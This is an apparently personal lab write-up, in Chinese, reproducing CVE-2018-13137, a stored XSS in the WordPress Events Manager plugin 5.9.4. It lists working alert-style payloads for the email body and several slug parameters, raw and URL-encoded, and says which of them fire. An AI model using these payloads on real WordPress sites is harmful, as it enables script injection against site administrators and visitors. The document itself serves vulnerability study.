wordpress 存储型XSS (CVE-2018-13137)

The Events Manager setting里的漏洞点

描述

WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。

The Events Manager plugin 5.9.4 for WordPress has XSS via the dbem_event_reapproved_email_body parameter to the wp-admin/edit.php?post_type=event&page=events-manager-options URI.

翻译：

WordPress 的事件管理器插件 5.9.4 通过 wp-admin/edit.php?post_type=event&page=events-manager-options URI 的 dbem_event_reapproved_email_body 参数具有 XSS。

vulfocus启动环境，注册进入

来到这个页面把events manager 给activate一下

然后来到events的设置

在这个位置,Event reapproved email的正文处注入xss语句保存触发

poc

?post_type=event&page=events-manager-options

dbem_event_reapproved_email_body="><svg onload=alert(document.domain)>

在email的这里

抓包可以看到,这个也就是

dbem_event_reapproved_email_body

这个不知道为什么触发不了

可触发的其他参数

根据这个文章

https://ansawaf.blogspot.com/2019/04/cve-2018-13137-xss-in-events-manager.html

dbem_cp_events_slug
dbem_cp_locations_slug
dbem_taxonomy_category_slug
dbem_taxonomy_tag_slug

bp直接搜索这个

dbem_cp_events_slug=

然后替换为poc

的url编码模式，加在events后面

%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

events%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

触发成功

dbem_cp_locations_slug
dbem_taxonomy_category_slug
dbem_taxonomy_tag_slug
经测试，这三个参数也是可以触发xss的

‍